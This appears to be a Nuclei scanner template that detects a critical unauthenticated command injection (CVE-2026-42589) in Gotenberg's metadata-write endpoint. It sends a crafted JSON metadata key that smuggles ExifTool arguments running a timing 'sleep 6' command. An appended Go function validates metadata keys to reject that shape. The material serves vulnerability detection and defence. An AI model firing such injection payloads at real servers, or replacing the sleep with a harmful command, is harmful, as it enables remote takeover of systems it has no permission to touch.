id: CVE-2026-42589

info:
  name: Gotenberg - Command Injection
  author: fineman999
  severity: critical
  description: |
    Gotenberg before 8.31.0 contains a command injection caused by a lack of validation of JSON metadata keys in the /forms/pdfengines/metadata/write endpoint, letting unauthenticated attackers execute OS commands via a crafted HTTP request.
  impact: |
    Unauthenticated attackers can execute arbitrary OS commands remotely, potentially leading to full system compromise.
  remediation: |
    Update to version 8.31.0 or later.
  reference:
    - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-rqgh-gxv4-6657
    - https://github.com/gotenberg/gotenberg/releases/tag/v8.31.0
    - https://nvd.nist.gov/vuln/detail/CVE-2026-42589
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-42589
    epss-score: 0.02397
    epss-percentile: 0.81851
    cwe-id: CWE-78
  metadata:
    verified: true
    vendor: gotenberg
    product: gotenberg
    max-request: 2
  tags: cve,cve2026,gotenberg,exiftool,rce,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /version HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "< 8.31.0")'
          - 'contains(to_lower(header), "gotenberg")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - "([0-9.]+)"
        internal: true

  - raw:
      - |
        @timeout: 10s
        POST /forms/pdfengines/metadata/write HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}

        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="files"; filename="sample.pdf"
        Content-Type: application/pdf

        %PDF-1.1
        1 0 obj
        << /Type /Catalog /Pages 2 0 R >>
        endobj
        2 0 obj
        << /Type /Pages /Kids [3 0 R] /Count 1 >>
        endobj
        3 0 obj
        << /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >>
        endobj
        xref
        0 4
        0000000000 65535 f
        0000000009 00000 n
        0000000058 00000 n
        0000000115 00000 n
        trailer
        << /Root 1 0 R /Size 4 >>
        startxref
        186
        %%EOF
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="metadata"

        {"Title\n-if\nsystem('sleep 6')||1\n-Comment":"x"}
        ------WebKitFormBoundary{{randstr}}--

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code == 500"
          - "duration >= 6"
        condition: and
# digest: 4a0a0047304502205eda6c504549d6c5182ff90e852a8c7f983095f5371e05e09419c823e994194d02210088974083d6995e601dec0b6dc33fb3f5ef286d285999e5f32bf1b8864313d253:922c64590222798bb761d5b6d8e72950
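A defender-side check for the weakness this template probes (CWE-78 via unvalidated JSON metadata keys handed to ExifTool), added here as an example and not Gotenberg's own code or its 8.31.0 fix: every key in the submitted `metadata` object is validated against an allow-list of tag-name characters before it could ever become a command argument, so a key carrying a newline or a leading dash is rejected. The regex policy, the function names and the sample request bodies are assumptions constructed for this example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
	"unicode"
)

// Allow-list for ExifTool-style tag names such as "Title" or "XMP-dc:Creator".
// Assumed policy for this example, not Gotenberg's own validation code.
var metadataKeyRE = regexp.MustCompile(`^[A-Za-z][A-Za-z0-9_-]*(:[A-Za-z][A-Za-z0-9_-]*)?$`)

// ValidateMetadataKeys parses the JSON object a client submits as "metadata"
// and rejects any key that could be read as an extra ExifTool argument:
// a leading "-", a newline or other control character, or an empty key.
func ValidateMetadataKeys(rawJSON []byte) ([]string, error) {
	var meta map[string]interface{}
	if err := json.Unmarshal(rawJSON, &meta); err != nil {
		return nil, fmt.Errorf("metadata is not a JSON object: %w", err)
	}
	keys := make([]string, 0, len(meta))
	for k := range meta {
		if err := checkKey(k); err != nil {
			return nil, err
		}
		keys = append(keys, k)
	}
	return keys, nil
}

func checkKey(k string) error {
	for _, r := range k {
		if unicode.IsControl(r) {
			return fmt.Errorf("metadata key %q contains a control character", k)
		}
	}
	if !metadataKeyRE.MatchString(k) {
		return fmt.Errorf("metadata key %q is not a valid tag name", k)
	}
	return nil
}

func main() {
	// Constructed input: the key shape the template above sends, which must be rejected.
	_, err := ValidateMetadataKeys([]byte(`{"Title\n-if\nsystem('sleep 6')||1\n-Comment":"x"}`))
	fmt.Println("rejected:", err)
}
```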